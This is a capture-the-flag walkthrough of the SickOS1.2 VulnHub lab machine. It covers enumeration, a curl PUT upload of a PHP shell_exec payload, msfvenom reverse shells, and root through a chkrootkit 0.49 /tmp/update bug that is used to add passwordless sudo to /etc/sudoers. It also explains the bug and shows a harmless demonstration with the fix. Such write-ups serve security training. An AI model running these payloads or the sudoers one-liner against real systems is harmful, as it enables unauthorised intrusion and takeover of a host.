SickOS1.2 vulnhub Walkthrough
The main purpose of writing this walkthrough is that this is a tricky machine and I learnt a lot from it. So I am trying to explain in detail even the simple gaps and tricky parts, which might persist in the minds of newbies like me.
ENUMERATION
Starting with netdiscover to find the IP: #netdiscover -r 10.0.2.0/24
Doing an nmap full-port scan on the target:
root@kali:~/Downloads/vuln/SickOS2# nmap -Pn -p- -A -o fullport.nmap 10.0.2.10
We see that ports 22 and 80 are open.
SSH Enumeration
I tried OpenSSH 5.9p1 on searchsploit, which gave me nothing. Anonymous login wasn't allowed either.
HTTP Enumeration
As always, we do a quick nikto scan on the target, followed by a dirbuster scan.
The nikto scan gave some information disclosure:
- Lighttpd/1.4.28 : lighttpd (pronounced "lighty") is an open-source web server optimized for speed-critical environments while remaining standards-compliant, secure and flexible
- PHP/5.3.10-ubuntu3.21
Let us open the target in a browser and view its source code.
This shows only
<!-- NOTHING IN HERE ///\\\ -->
Then we look for an exploit for lighttpd 1.4.28, if any exists. For this I used searchsploit, which finds the following vulnerability: directory traversal + information disclosure.
But on trying tricks like http://10.0.2.10/../../../../../../../../../etc/passwd, the URL just changed to http://10.0.2.10/etc/passwd, which confirmed there was no directory traversal.
Time for a dirbuster scan:
Our dirbuster scan revealed only 3 things:
- /index.php (already visited)
- /
- /test/
Opened http://10.0.2.10/test. It shows only an option to go back to the parent directory, and nothing much in the source code.
So I tried different HTTP methods like
- TRACE
- PUT
- HEAD
- OPTIONS // works here, as if it were a WebDAV directory
- PUT // worked here to upload a PHP payload. So it's time for exploitation.
EXPLOITATION
To start the exploitation, let's make a curl request to upload a PHP file.
I used msfvenom to make a payload as abcd.php.
Once you have your abcd.php created by msfvenom, open the exploit/multi/handler module in msfconsole and start the listener.
Then open abcd.php to get a reverse shell. But we don't get a shell. So we try it manually, by making a curl request:
root@kali:~/Downloads/vuln/SickOS2# curl --silent -X PUT 10.0.2.10/test/execute.php -H 'Expect: ' -d "<?php echo shell_exec('id'); ?>"
Doing this gives the following output on accessing http://10.0.2.10/test/execute.php
So we know we can execute shell commands. So we will use netcat: we set a listener on our machine on a port, say 1234.
Now make a curl request to PUT a file which executes netcat to connect back to our machine on port 1234.
But when we executed the script at http://10.0.2.10/test/execute.php, we didn't get a connection back.
This means outbound connections to random ports are blocked on this machine.
Tricky part: so now we enumerate which common ports are allowed for outbound connections. For this we write a script with a for loop that tries a connection on each port one by one and reports the result.
Running this script shows it can connect back on port 443. So we make a PHP payload with msfvenom using this port,
upload it to the site and open msfconsole exploit/multi/handler.
And we got the shell.
PRIVILEGE ESCALATION
This is a very tricky machine. I enumerated approximately everything on the machine and couldn't find anything. But in /etc/cron.daily there was a chkrootkit entry.
On enumerating with the command
#dpkg -l
I found chkrootkit installed as an application.
The vulnerability in chkrootkit version 0.49 is that the code in /tmp/update gets executed if file_port is empty while chkrootkit runs as root.
Following is the code with explanation (the slapper() check from chkrootkit 0.49):
#
# SLAPPER.{A,B,C,D} and the multi-platform variant
#
slapper (){
   SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
   SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
   ${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
   SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
   OPT=-an
   STATUS=0
   file_port=

   # file_port is only filled in here if one of the slapper ports is listening
   if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}"> /dev/null 2>&1
   then
      STATUS=1
      [ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
         $egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' |
         tr -d :`
   fi

   # unquoted assignment: the vulnerable line
   for i in ${SLAPPER_FILES}; do
      if [ -f ${i} ]; then
         file_port=$file_port $i
         STATUS=1
      fi
   done

   if [ ${STATUS} -eq 1 ] ;then
      echo "Warning: Possible Slapper Worm installed ($file_port)"
   else
      if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
      return ${NOT_INFECTED}
   fi
}
As highlighted above, the variables SLAPPER_FILES and SLAPPER_PORT are assigned a list of file paths and ports to look at.
The vulnerability is in the line file_port=$file_port $i. The assignment is not quoted, so when this statement executes with $file_port empty, the shell does not set file_port to $i; it treats $i as a command to run, i.e. it executes each file name that the loop finds on disk, one of which is /tmp/update.
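To make the mechanism concrete, here is an added demonstration (not code from the walkthrough or from chkrootkit) that runs the vulnerable loop and the quoted, corrected form against a harmless stand-in file in a throwaway directory, so you can see which one actually executes the file:

```shell
#!/bin/sh
# Added demonstration of the word-splitting bug in chkrootkit's slapper()
# check (not code from the walkthrough or from chkrootkit). Everything
# happens in a throwaway directory; nothing is written to /tmp/update.
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT

# Constructed stand-in for /tmp/update: a harmless script that only leaves
# a marker file behind so we can tell whether it was executed.
printf '#!/bin/sh\necho executed > "%s/marker"\n' "$demo_dir" > "$demo_dir/update"
chmod +x "$demo_dir/update"

# The 0.49 logic: the assignment is unquoted, so the shell parses
# `file_port=$file_port $i` as "run the command $i with file_port set in
# its environment". The file found on disk is executed instead of being
# appended to the list. Returns 0 (true) when the stand-in ran.
vulnerable_slapper_check() {
    file_port=
    rm -f "$demo_dir/marker"
    for i in "$demo_dir/update"; do
        if [ -f "$i" ]; then
            file_port=$file_port $i
        fi
    done
    [ -f "$demo_dir/marker" ]
}

# The obvious fix: quoting turns the line back into a plain string
# assignment and nothing is executed. Same return convention, so the
# expected result here is 1 (false).
fixed_slapper_check() {
    file_port=
    rm -f "$demo_dir/marker"
    for i in "$demo_dir/update"; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"
        fi
    done
    [ -f "$demo_dir/marker" ]
}

if vulnerable_slapper_check; then echo "unquoted assignment: file was executed"; fi
if fixed_slapper_check; then echo "quoted assignment: file was executed"; else echo "quoted assignment: file was not executed"; fi
```

The same defect is why a cron job running chkrootkit 0.49 as root is dangerous on any host where an unprivileged user can create /tmp/update; upgrading past 0.49, or quoting that assignment, removes the code path.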
Exploit: we will create /tmp/update, a file with our code, because /tmp/ is world-writable and chkrootkit runs as root.
Here we can write, for example, any one of the following:
- reverse shell one liner
- #!/bin/sh to be executed
- Add our user to the sudoers list with no password required for sudo, making the sudoers file readable for user and group in the process.
www-data@ubuntu:/tmp$ echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
Now since this script runs daily, we would need to wait for a day. I gave a try to the last one, because the first didn't seem to work for me; I don't know why, though. Then I also modified the permissions of /tmp/update to make it executable.
And we got root, within a few minutes at that. So I grabbed the flag.
Actually chkrootkit was running every minute, which I found during post-exploitation as root.
This box was quite tricky and took a lot of googling, a small amount of cheating and a lot of time. But I learnt a lot. Hope you did the same!!!